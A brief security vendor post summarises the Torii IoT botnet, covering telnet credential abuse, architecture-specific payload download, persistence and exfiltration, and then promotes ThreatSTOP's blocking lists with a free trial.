An extremely sophisticated IoT botnet has recently been discovered and dubbed “Torii.” One of Torii malware’s many advanced capabilities is running on just about every type of smartphone, computer and tablet, with over 100 malware variants supporting over 15 different architectures.

A Torii infections starts with the exploitation of weak credentials in IoT to deploy a telnet attack, after which a shell script determines the architecture of machine. The relevant payload is then downloaded to install Torii.

The malware has a variety of persistence maintenance features, making it very hard to get rid of, as well as an abundant set of exfiltration features.


ThreatSTOP protects customers against Torii. To ensure you are protected, make sure that TS Originated - Core Threats - IPs and TS Originated - Core Threats - Domains targets are enabled.

Not sure if you're currently protected against Torii and other botnets? Try out ThreatSTOP for 14 days, free.